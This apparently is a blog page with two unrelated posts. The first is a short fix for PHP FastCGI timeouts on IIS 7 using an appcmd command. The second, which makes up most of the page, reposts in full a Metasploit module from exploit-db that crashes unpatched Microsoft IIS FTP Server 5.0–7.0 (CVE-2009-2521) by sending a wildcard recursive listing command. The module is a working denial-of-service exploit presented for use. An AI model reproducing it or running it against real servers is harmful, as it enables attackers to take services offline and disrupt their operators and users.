How to Solve unexpectedly Error 500 (Timeout) PHP + FastCGI + IIS 7 (Windows 7/8/10/2008/2012 server)

Standard

I could found some links that could help you. The problem is the activityTimeout of your cgi module.

For my, works in summary this.

Open the dos console “cmd” and go to c:\windows\system32\inetsrv\ then, execute this command, changing the path of your php-cgiappcmd set config -section:system.webServer/fastCgi "-[fullPath='C:\php\php-cgi.exe'].activityTimeout:3600"

Microsoft IIS FTP Server

Standard

# Exploit Title: [MS09-053] Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS
# Date: Jul 03, 2011
# Author: Myo Soe
# Software Link: http://www.microsoft.com/
# Version: 5.0 - 7.0
# Tested on: unpatched version of windows xp & 2k3

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Dos

def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft IIS FTP Server <= 7.0 LIST Stack Exhaustion Denial of Service',
'Description' => %q{
This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. This exploit is especially meant for the service which is configured as "manual" mode in startup type.
},
'Author' => [
'Nikolaos "Kingcope" Rangos', # Bug Discoverer
'Myo Soe ' # Metasploit Module
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 1.0 $',
'References' =>
[
[ 'CVE', '2009-2521'],
[ 'BID', '36273'],
[ 'OSVDB', '57753'],
[ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],
[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']

],
'DisclosureDate' => 'Sep 03 2009'))

register_options([
OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'mozilla@example.com' ])
])
end

def run

return unless connect_login

print_status("Sending DoS packets ...")

send_cmd_data(['ls','-R */../'],nil)

disconnect

print_good("Done")

end
end

Fonte: http://www.exploit-db.com/exploits/17476/